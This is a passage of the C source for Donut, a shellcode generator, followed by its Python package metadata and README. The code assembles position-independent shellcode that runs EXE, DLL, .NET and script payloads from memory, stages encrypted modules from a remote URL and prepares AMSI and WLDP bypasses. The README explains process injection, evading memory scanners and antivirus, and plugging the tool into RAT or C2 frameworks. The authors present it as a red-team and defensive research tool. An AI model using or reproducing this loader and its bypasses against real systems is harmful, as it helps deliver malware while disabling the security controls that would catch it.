714 memcpy(&inst->xIID_IActiveScriptParse64, &xIID_IActiveScriptParse64, sizeof(GUID));
715
716 utf8_to_utf16(inst->wscript, "WScript");
717 utf8_to_utf16(inst->wscript_exe, "wscript.exe");
718
719 if(c->mod_type == DONUT_MODULE_VBS) {
720 memcpy(&inst->xCLSID_ScriptLanguage, &xCLSID_VBScript, sizeof(GUID));
721 } else {
722 memcpy(&inst->xCLSID_ScriptLanguage, &xCLSID_JScript, sizeof(GUID));
723 }
724 } else
725 // if module is XSL
726 if(c->mod_type == DONUT_MODULE_XSL)
727 {
728 DPRINT("Copying GUID structures for loading XSL to instance");
729
730 memcpy(&inst->xCLSID_DOMDocument30, &xCLSID_DOMDocument30, sizeof(GUID));
731 memcpy(&inst->xIID_IXMLDOMDocument, &xIID_IXMLDOMDocument, sizeof(GUID));
732 memcpy(&inst->xIID_IXMLDOMNode, &xIID_IXMLDOMNode, sizeof(GUID));
733 }
734
735 // required to disable AMSI
736 strcpy(inst->amsi.s, "AMSI");
737 strcpy(inst->amsiInit, "AmsiInitialize");
738 strcpy(inst->amsiScanBuf, "AmsiScanBuffer");
739 strcpy(inst->amsiScanStr, "AmsiScanString");
740
741 strcpy(inst->clr, "CLR");
742
743 // required to disable WLDP
744 strcpy(inst->wldp, "WLDP");
745 strcpy(inst->wldpQuery, "WldpQueryDynamicCodeTrust");
746 strcpy(inst->wldpIsApproved, "WldpIsClassInApprovedList");
747
748 // set the type of instance we're creating
749 inst->type = c->inst_type;
750
751 // if the module will be downloaded
752 // set the URL parameter and request verb
753 if(inst->type == DONUT_INSTANCE_URL) {
754 // generate a random name for module
755 // that will be saved to disk
756 if(!GenRandomString(c->modname, DONUT_MAX_MODNAME)) {
757 return DONUT_ERROR_RANDOM;
758 }
759 DPRINT("Generated random name for module : %s", c->modname);
760
761 DPRINT("Setting URL parameters");
762 strcpy(inst->http.url, c->url);
763 // append module name
764 strcat(inst->http.url, c->modname);
765 // set the request verb
766 strcpy(inst->http.req, "GET");
767
768 DPRINT("Payload will attempt download from : %s", inst->http.url);
769 }
770
771 inst->mod_len = c->mod_len;
772 inst->len = inst_len;
773 c->inst = inst;
774 c->inst_len = inst_len;
775
776 #if !defined(NOCRYPTO)
777 if(c->inst_type == DONUT_INSTANCE_URL) {
778 DPRINT("encrypting module for download");
779
780 c->mod->mac = maru(inst->sig, inst->iv);
781
782 donut_encrypt(
783 mod_key.mk,
784 mod_key.ctr,
785 c->mod,
786 c->mod_len);
787 }
788 #endif
789 // if PIC, copy module to instance
790 if(inst->type == DONUT_INSTANCE_PIC) {
791 DPRINT("Copying module data to instance");
792 memcpy(&c->inst->module.x, c->mod, c->mod_len);
793 }
794
795 #if !defined(NOCRYPTO)
796 DPRINT("encrypting instance");
797
798 inst->mac = maru(inst->sig, inst->iv);
799
800 uint8_t *inst_data = (uint8_t*)inst + offsetof(DONUT_INSTANCE, api_cnt);
801
802 donut_encrypt(
803 inst_key.mk,
804 inst_key.ctr,
805 inst_data,
806 c->inst_len - offsetof(DONUT_INSTANCE, api_cnt));
807 #endif
808 DPRINT("Leaving.");
809
810 return DONUT_ERROR_SUCCESS;
811 }
812
813 // given a configuration, create a PIC that will run from anywhere in memory
814 EXPORT_FUNC
815 int DonutCreate(PDONUT_CONFIG c) {
816 uint8_t *pl;
817 uint32_t t;
818 int url_len, err = DONUT_ERROR_SUCCESS;
819 FILE *fd;
820 file_info fi;
821
822 DPRINT("Entering.");
823
824 DPRINT("Validating configuration and path of file PDONUT_CONFIG: %p", c);
825
826 if(c == NULL || c->file[0] == 0) {
827 return DONUT_ERROR_INVALID_PARAMETER;
828 }
829
830 c->mod = NULL;
831 c->mod_len = 0;
832
833 c->inst = NULL;
834 c->inst_len = 0;
835
836 c->pic = NULL;
837 c->pic_len = 0;
838
839 // instance not specified?
840 DPRINT("Validating instance type %" PRIx32 "", c->inst_type);
841
842 if(c->inst_type != DONUT_INSTANCE_PIC &&
843 c->inst_type != DONUT_INSTANCE_URL) {
844
845 return DONUT_ERROR_INVALID_PARAMETER;
846 }
847
848 if(c->inst_type == DONUT_INSTANCE_URL) {
849 DPRINT("Validating URL");
850
851 // no URL? exit
852 if(c->url[0] == 0) {
853 return DONUT_ERROR_INVALID_PARAMETER;
854 }
855 // doesn't begin with one of the following? exit
856 if((strnicmp(c->url, "http://", 7) != 0) &&
857 (strnicmp(c->url, "https://", 8) != 0)) {
858
859 return DONUT_ERROR_INVALID_URL;
860 }
861 // invalid length?
862 if(strlen(c->url) <= 8) {
863 return DONUT_ERROR_URL_LENGTH;
864 }
865 // ensure URL parameter and module name don't exceed DONUT_MAX_URL
866 url_len = strlen(c->url);
867
868 // if the end of string doesn't have a forward slash
869 // add one more to account for it
870 if(c->url[url_len - 1] != '/') {
871 strcat(c->url, "/");
872 url_len++;
873 }
874
875 if((url_len + DONUT_MAX_MODNAME) >= DONUT_MAX_URL) {
876 return DONUT_ERROR_URL_LENGTH;
877 }
878 }
879
880 DPRINT("Validating architecture");
881
882 if(c->arch != DONUT_ARCH_X86 &&
883 c->arch != DONUT_ARCH_X64 &&
884 c->arch != DONUT_ARCH_X84 &&
885 c->arch != DONUT_ARCH_ANY)
886 {
887 return DONUT_ERROR_INVALID_ARCH;
888 }
889
890 DPRINT("Validating AMSI/WDLP bypass option");
891
892 if(c->bypass != DONUT_BYPASS_SKIP &&
893 c->bypass != DONUT_BYPASS_ABORT &&
894 c->bypass != DONUT_BYPASS_CONTINUE)
895 {
896 return DONUT_ERROR_BYPASS_INVALID;
897 }
898
899 // get file information
900 err = get_file_info(c->file, &fi);
901 if(err != DONUT_ERROR_SUCCESS) return err;
902
903 // Set the module type
904 c->mod_type = fi.type;
905
906 // Unmanaged EXE/DLL?
907 if(c->mod_type == DONUT_MODULE_DLL ||
908 c->mod_type == DONUT_MODULE_EXE)
909 {
910 DPRINT("Validating architecture %i for DLL/EXE %i",
911 c->arch, fi.arch);
912 // Requested shellcode is x86, but file is x64?
913 // Requested shellcode is x64, but file is x86?
914 if((c->arch == DONUT_ARCH_X86 &&
915 fi.arch == DONUT_ARCH_X64) ||
916 (c->arch == DONUT_ARCH_X64 &&
917 fi.arch == DONUT_ARCH_X86))
918 {
919 err = DONUT_ERROR_ARCH_MISMATCH;
920 goto cleanup;
921 }
922 // DLL function specified. Does it exist?
923 if(c->mod_type == DONUT_MODULE_DLL &&
924 c->method[0] != 0)
925 {
926 DPRINT("Validating DLL function \"%s\" for DLL", c->method);
927 if(!is_dll_export(&fi, c->method)) {
928 err = DONUT_ERROR_DLL_FUNCTION;
929 goto cleanup;
930 }
931 }
932 }
933 // .NET DLL assembly?
934 if(c->mod_type == DONUT_MODULE_NET_DLL) {
935 // DLL requires class and method
936 if(c->cls[0] == 0 || c->method[0] == 0) {
937 err = DONUT_ERROR_NET_PARAMS;
938 goto cleanup;
939 }
940 }
941
942 // is this an unmanaged DLL with parameters?
943 if(c->mod_type == DONUT_MODULE_DLL &&
944 c->param[0] != 0)
945 {
946 // we need a DLL function
947 if(c->method[0] == 0) {
948 err = DONUT_ERROR_DLL_PARAM;
949 goto cleanup;
950 }
951 }
952 // 1. Create the module
953 DPRINT("Creating module");
954 err = CreateModule(c, &fi);
955
956 if(err != DONUT_ERROR_SUCCESS)
957 goto cleanup;
958
959 // 2. Create the instance
960 DPRINT("Creating instance");
961 err = CreateInstance(c, &fi);
962
963 if(err != DONUT_ERROR_SUCCESS)
964 goto cleanup;
965
966 // if DEBUG is defined, save instance to disk
967 #ifdef DEBUG
968 DPRINT("Saving instance to file");
969 fd = fopen("instance", "wb");
970
971 if(fd != NULL) {
972 fwrite(c->inst, 1, c->inst_len, fd);
973 fclose(fd);
974 }
975 #endif
976 // 3. If the module will be stored on a remote server
977 if(c->inst_type == DONUT_INSTANCE_URL) {
978 DPRINT("Saving %s to disk.", c->modname);
979 // save the module to disk using random name
980 fd = fopen(c->modname, "wb");
981
982 if(fd != NULL) {
983 fwrite(c->mod, 1, c->mod_len, fd);
984 fclose(fd);
985 }
986 }
987 // 4. calculate size of PIC + instance combined
988 if(c->arch == DONUT_ARCH_X86) {
989 c->pic_len = sizeof(PAYLOAD_EXE_X86) + c->inst_len + 32;
990 } else
991 if(c->arch == DONUT_ARCH_X64) {
992 c->pic_len = sizeof(PAYLOAD_EXE_X64) + c->inst_len + 32;
993 } else
994 if(c->arch == DONUT_ARCH_X84) {
995 c->pic_len = sizeof(PAYLOAD_EXE_X86) +
996 sizeof(PAYLOAD_EXE_X64) + c->inst_len + 32;
997 }
998 // 5. allocate memory for shellcode
999 c->pic = malloc(c->pic_len);
1000
1001 DPRINT("PIC size : %" PRIi64, c->pic_len);
1002
1003 if(c->pic == NULL) {
1004 err = DONUT_ERROR_NO_MEMORY;
1005 goto cleanup;
1006 }
1007
1008 DPRINT("Inserting opcodes");
1009 // 6. insert shellcode
1010 pl = (uint8_t*)c->pic;
1011 // call $ + c->inst_len
1012 PUT_BYTE(pl, 0xE8);
1013 PUT_WORD(pl, c->inst_len);
1014 PUT_BYTES(pl, c->inst, c->inst_len);
1015 // pop ecx
1016 PUT_BYTE(pl, 0x59);
1017
1018 // x86?
1019 if(c->arch == DONUT_ARCH_X86) {
1020 // pop edx
1021 PUT_BYTE(pl, 0x5A);
1022 // push ecx
1023 PUT_BYTE(pl, 0x51);
1024 // push edx
1025 PUT_BYTE(pl, 0x52);
1026
1027 DPRINT("Copying %" PRIi64 " bytes of x86 shellcode",
1028 (uint64_t)sizeof(PAYLOAD_EXE_X86));
1029
1030 PUT_BYTES(pl, PAYLOAD_EXE_X86, sizeof(PAYLOAD_EXE_X86));
1031 } else
1032 // AMD64?
1033 if(c->arch == DONUT_ARCH_X64) {
1034
1035 DPRINT("Copying %" PRIi64 " bytes of amd64 shellcode",
1036 (uint64_t)sizeof(PAYLOAD_EXE_X64));
1037
1038 PUT_BYTES(pl, PAYLOAD_EXE_X64, sizeof(PAYLOAD_EXE_X64));
1039 } else
1040 // x86 + AMD64?
1041 if(c->arch == DONUT_ARCH_X84) {
1042
1043 DPRINT("Copying %" PRIi64 " bytes of x86 + amd64 shellcode",
1044 (uint64_t)(sizeof(PAYLOAD_EXE_X86) + sizeof(PAYLOAD_EXE_X64)));
1045
1046 // xor eax, eax
1047 PUT_BYTE(pl, 0x31);
1048 PUT_BYTE(pl, 0xC0);
1049 // dec eax
1050 PUT_BYTE(pl, 0x48);
1051 // js dword x86_code
1052 PUT_BYTE(pl, 0x0F);
1053 PUT_BYTE(pl, 0x88);
1054 PUT_WORD(pl, sizeof(PAYLOAD_EXE_X64));
1055 PUT_BYTES(pl, PAYLOAD_EXE_X64, sizeof(PAYLOAD_EXE_X64));
1056 // pop edx
1057 PUT_BYTE(pl, 0x5A);
1058 // push ecx
1059 PUT_BYTE(pl, 0x51);
1060 // push edx
1061 PUT_BYTE(pl, 0x52);
1062 PUT_BYTES(pl, PAYLOAD_EXE_X86, sizeof(PAYLOAD_EXE_X86));
1063 }
1064 cleanup:
1065 // if there was some error, release resources
1066 if(err != DONUT_ERROR_SUCCESS) {
1067 DonutDelete(c);
1068 }
1069 unmap_file(&fi);
1070 DPRINT("Leaving.");
1071 return err;
1072 }
1073
1074 // release resources allocated for configuration
1075 EXPORT_FUNC
1076 int DonutDelete(PDONUT_CONFIG c) {
1077
1078 DPRINT("Entering.");
1079 if(c == NULL) {
1080 return DONUT_ERROR_INVALID_PARAMETER;
1081 }
1082 // free module
1083 if(c->mod != NULL) {
1084 free(c->mod);
1085 c->mod = NULL;
1086 }
1087 // free instance
1088 if(c->inst != NULL) {
1089 free(c->inst);
1090 c->inst = NULL;
1091 }
1092 // free payload
1093 if(c->pic != NULL) {
1094 free(c->pic);
1095 c->pic = NULL;
1096 }
1097 DPRINT("Leaving.");
1098 return DONUT_ERROR_SUCCESS;
1099 }
1100
1101 // define when building an executable
1102 #ifdef DONUT_EXE
1103
1104 const char *err2str(int err) {
1105 static const char *str="N/A";
1106
1107 switch(err) {
1108 case DONUT_ERROR_SUCCESS:
1109 str = "No error";
1110 break;
1111 case DONUT_ERROR_FILE_NOT_FOUND:
1112 str = "File not found";
1113 break;
1114 case DONUT_ERROR_FILE_EMPTY:
1115 str = "File is empty";
1116 break;
1117 case DONUT_ERROR_FILE_ACCESS:
1118 str = "Cannot open file";
1119 break;
1120 case DONUT_ERROR_FILE_INVALID:
1121 str = "File is invalid";
1122 break;
1123 case DONUT_ERROR_NET_PARAMS:
1124 str = "File is a .NET DLL. Donut requires a class and method";
1125 break;
1126 case DONUT_ERROR_NO_MEMORY:
1127 str = "No memory available";
1128 break;
1129 case DONUT_ERROR_INVALID_ARCH:
1130 str = "Invalid architecture specified";
1131 break;
1132 case DONUT_ERROR_INVALID_URL:
1133 str = "Invalid URL";
1134 break;
1135 case DONUT_ERROR_URL_LENGTH:
1136 str = "Invalid URL length";
1137 break;
1138 case DONUT_ERROR_INVALID_PARAMETER:
1139 str = "Invalid parameter";
1140 break;
1141 case DONUT_ERROR_RANDOM:
1142 str = "Error generating random values";
1143 break;
1144 case DONUT_ERROR_DLL_FUNCTION:
1145 str = "Unable to locate DLL function provided. Names are case sensitive";
1146 break;
1147 case DONUT_ERROR_ARCH_MISMATCH:
1148 str = "Target architecture cannot support selected DLL/EXE file";
1149 break;
1150 case DONUT_ERROR_DLL_PARAM:
1151 str = "You've supplied parameters for an unmanaged DLL. Donut also requires a DLL function";
1152 break;
1153 case DONUT_ERROR_BYPASS_INVALID:
1154 str = "Invalid bypass option specified";
1155 break;
1156 }
1157 return str;
1158 }
1159
1160 static char* get_param (int argc, char *argv[], int *i) {
1161 int n = *i;
1162 if (argv[n][2] != 0) {
1163 return &argv[n][2];
1164 }
1165 if ((n+1) < argc) {
1166 *i = n + 1;
1167 return argv[n+1];
1168 }
1169 printf(" [ %c%c requires parameter\n", argv[n][0], argv[n][1]);
1170 exit (0);
1171 }
1172
1173 static void usage (void) {
1174 printf(" usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>\n\n");
1175
1176 printf(" -MODULE OPTIONS-\n\n");
1177 printf(" -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.\n");
1178 printf(" -u <URL> HTTP server that will host the donut module.\n\n");
1179
1180 printf(" -PIC/SHELLCODE OPTIONS-\n\n");
1181 printf(" -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).\n");
1182 printf(" -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)\n");
1183 printf(" -o <payload> Output file. Default is \"payload.bin\"\n\n");
1184
1185 printf(" -DOTNET OPTIONS-\n\n");
1186 printf(" -c <namespace.class> Optional class name. (required for .NET DLL)\n");
1187 printf(" -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)\n");
1188 printf(" -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.\n");
1189 printf(" -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.\n");
1190 printf(" -d <name> AppDomain name to create for .NET. Randomly generated by default.\n\n");
1191
1192 printf(" examples:\n\n");
1193 printf(" donut -f c2.dll\n");
1194 printf(" donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll\n");
1195 printf(" donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/\n");
1196
1197 exit (0);
1198 }
1199
1200 int main(int argc, char *argv[]) {
1201 DONUT_CONFIG c;
1202 char opt;
1203 int i, err;
1204 FILE *fd;
1205 char *mod_type, *payload="payload.bin",
1206 *arch_str[3] = { "x86", "AMD64", "x86+AMD64" };
1207 char *inst_type[2]= { "PIC", "URL" };
1208
1209 printf("\n");
1210 printf(" [ Donut shellcode generator v0.9.2\n");
1211 printf(" [ Copyright (c) 2019 TheWover, Odzhan\n\n");
1212
1213 // zero initialize configuration
1214 memset(&c, 0, sizeof(c));
1215
1216 // default type is position independent code for dual-mode (x86 + amd64)
1217 c.inst_type = DONUT_INSTANCE_PIC;
1218 c.arch = DONUT_ARCH_X84;
1219 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
1220
1221 // parse arguments
1222 for(i=1; i<argc; i++) {
1223 // switch?
1224 if(argv[i][0] != '-' && argv[i][0] != '/') {
1225 usage();
1226 }
1227 opt = argv[i][1];
1228
1229 switch(opt) {
1230 // target cpu architecture
1231 case 'a':
1232 c.arch = atoi(get_param(argc, argv, &i));
1233 break;
1234 // bypass options
1235 case 'b':
1236 c.bypass = atoi(get_param(argc, argv, &i));
1237 break;
1238 // name of domain to use for .NET assembly
1239 case 'd':
1240 strncpy(c.domain, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1241 break;
1242 // EXE/DLL/VBS/JS/XSL file to embed in shellcode
1243 case 'f':
1244 strncpy(c.file, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1245 break;
1246 // runtime version to use for .NET DLL / EXE
1247 case 'r':
1248 strncpy(c.runtime, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1249 break;
1250 // URL of remote module
1251 case 'u': {
1252 strncpy(c.url, get_param(argc, argv, &i), DONUT_MAX_URL - 2);
1253 c.inst_type = DONUT_INSTANCE_URL;
1254 break;
1255 }
1256 // class of .NET assembly
1257 case 'c':
1258 strncpy(c.cls, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1259 break;
1260 // method of .NET assembly
1261 case 'm':
1262 strncpy(c.method, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1263 break;
1264 // output file for payload
1265 case 'o':
1266 payload = get_param(argc, argv, &i);
1267 break;
1268 // parameters to method or DLL function
1269 case 'p':
1270 strncpy(c.param, get_param(argc, argv, &i), sizeof(c.param) - 1);
1271 break;
1272 default:
1273 usage();
1274 break;
1275 }
1276 }
1277
1278 // no file? show usage and exit
1279 if(c.file[0] == 0) {
1280 usage();
1281 }
1282
1283 // generate payload from configuration
1284 err = DonutCreate(&c);
1285
1286 if(err != DONUT_ERROR_SUCCESS) {
1287 printf(" [ Error : %s\n", err2str(err));
1288 return 0;
1289 }
1290
1291 switch(c.mod_type) {
1292 case DONUT_MODULE_DLL:
1293 mod_type = "DLL";
1294 break;
1295 case DONUT_MODULE_EXE:
1296 mod_type = "EXE";
1297 break;
1298 case DONUT_MODULE_NET_DLL:
1299 mod_type = ".NET DLL";
1300 break;
1301 case DONUT_MODULE_NET_EXE:
1302 mod_type = ".NET EXE";
1303 break;
1304 case DONUT_MODULE_VBS:
1305 mod_type = "VBScript";
1306 break;
1307 case DONUT_MODULE_JS:
1308 mod_type = "JScript";
1309 break;
1310 case DONUT_MODULE_XSL:
1311 mod_type = "XSL";
1312 break;
1313 default:
1314 mod_type = "Unrecognized";
1315 break;
1316 }
1317 printf(" [ Instance type : %s\n", inst_type[c.inst_type - 1]);
1318 printf(" [ Module file : \"%s\"\n", c.file );
1319 printf(" [ File type : %s\n", mod_type);
1320
1321 // if this is a .NET DLL, display the class and method
1322 if(c.mod_type == DONUT_MODULE_NET_DLL) {
1323 printf(" [ Class : %s\n", c.cls );
1324 printf(" [ Method : %s\n", c.method);
1325 } else
1326 if(c.mod_type == DONUT_MODULE_DLL) {
1327 printf(" [ Function : %s\n",
1328 c.method[0] != 0 ? c.method : "DllMain");
1329 }
1330 // if parameters supplied, display them
1331 if(c.param[0] != 0) {
1332 printf(" [ Parameters : %s\n", c.param);
1333 }
1334 printf(" [ Target CPU : %s\n", arch_str[c.arch - 1]);
1335
1336 if(c.inst_type == DONUT_INSTANCE_URL) {
1337 printf(" [ Module name : %s\n", c.modname);
1338 printf(" [ Upload to : %s\n", c.url);
1339 }
1340
1341 printf(" [ AMSI/WDLP : %s\n",
1342 c.bypass == DONUT_BYPASS_SKIP ? "skip" :
1343 c.bypass == DONUT_BYPASS_ABORT ? "abort" : "continue");
1344
1345 printf(" [ Shellcode : \"%s\"\n\n", payload);
1346 fd = fopen(payload, "wb");
1347
1348 if(fd != NULL) {
1349 fwrite(c.pic, sizeof(char), c.pic_len, fd);
1350 fclose(fd);
1351 } else {
1352 printf(" [ Error opening \"%s\" for payload.\n", payload);
1353 }
1354 // release resources
1355 DonutDelete(&c);
1356 return 0;
1357 }
1358 #endif
0 Metadata-Version: 2.1
1 Name: donut-shellcode
2 Version: 0.9.2
3 Summary: Donut Python C extension
4 Home-page: https://github.com/TheWover/donut
5 Author: TheWover, Odzhan, byt3bl33d3r
6 License: UNKNOWN
7 Description: # Using Donut
8
9 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
10
11 Version: 0.9.2 *please submit issues and requests for v1.0 release*
12
13 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
14
15 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
16
17 v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
18
19 ## Introduction
20
21 Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
22
23 It can be used in several ways.
24
25 ## As a Standalone Tool
26
27 Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
28
29 ```
30
31 usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
32
33 -MODULE OPTIONS-
34
35 -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
36 -u <URL> HTTP server that will host the donut module.
37
38 -PIC/SHELLCODE OPTIONS-
39
40 -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
41 -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
42 -o <payload> Output file. Default is "payload.bin"
43
44 -DOTNET OPTIONS-
45
46 -c <namespace.class> Optional class name. (required for .NET DLL)
47 -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
48 -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
49 -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
50 -d <name> AppDomain name to create for .NET. Randomly generated by default.
51
52 examples:
53
54 donut -f c2.dll
55 donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
56 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
57
58 ```
59
60 ### Building Donut
61
62 Tags have been provided for each release version of donut that contain the compiled executables.
63
64 * v0.9.2, Bear Claw:
65 * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
66 * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
67 * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
68
69 However, you may also clone and build the source yourself using the provided makefiles.
70
71 ## Building From Repository
72
73 From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
74
75 ```
76 git clone http://github.com/thewover/donut
77 cd donut
78 ```
79
80 ## Linux
81
82 Simply run make to generate an executable, static and dynamic libraries.
83
84 ```
85 make
86 make clean
87 make debug
88 ```
89
90 ## Windows
91
92 Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
93
94 ```
95 nmake -f Makefile.msvc
96 nmake clean -f Makefile.msvc
97 nmake debug -f Makefile.msvc
98 ```
99
100 ## As a Library
101
102 donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
103
104 ## As a Python Module
105
106 Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
107
108 ```
109 pip install .
110 ```
111
112 Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
113
114 ```
115 pip install donut-shellcode
116 ```
117
118 ## As a Template - Rebuilding the shellcode
119
120 *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
121
122 ### Microsoft Visual Studio
123
124 **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
125
126 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
127
128 ```
129 nmake clean -f Makefile.msvc
130 nmake -f Makefile.msvc
131 ```
132
133 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
134
135 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
136
137 ```
138 nmake clean -f Makefile.msvc
139 nmake x86 -f Makefile.msvc
140 ```
141
142 This will save the shellcode as a C array to *payload_exe_x86.h*.
143
144 ### Mingw-w64
145
146 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
147
148 ```
149 make clean -f Makefile.mingw
150 make -f Makefile.mingw
151 ```
152
153 Once you've recompiled for all architectures, you may rebuild donut.
154
155 ## Bypasses
156
157 Donut includes a bypass system for AMSI and other security features. Currently we bypass:
158
159 * AMSI in .NET v4.8
160 * Device Guard policy preventing dynamicly generated code from executing
161
162 You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
163
164 Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
165
166 Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
167
168 Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
169
170 If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
171
172 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
173
174 ### Additional features.
175
176 These are left as exercises to the reader. I would personally recommend:
177
178 * Add environmental keying
179 * Make donut polymorphic by obfuscating *payload* every time shellcode is generated
180 * Integrate donut as a module into your favorite RAT/C2 Framework
181
182 ## Disclaimers
183
184 * No, we will not update donut to counter signatures or detections by any AV.
185 * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
186
187 # How it works
188
189 ## Procedure for Assemblies
190
191 Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
192
193 The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
194
195 Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
196
197 For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
198
199 Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
200
201 ## Procedure for ActiveScript/XSL
202
203 The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
204
205 ## Procedure for PE Loading
206
207 The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
208
209 ## Components
210
211 Donut contains the following elements:
212
213 * donut.c: The source code for the donut payload generator
214 * donut.exe: The compiled payload generator as an EXE
215 * donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
216 * donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
217 * setup.py: The setup file for installing Donut as a Pip Python3 module.
218 * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
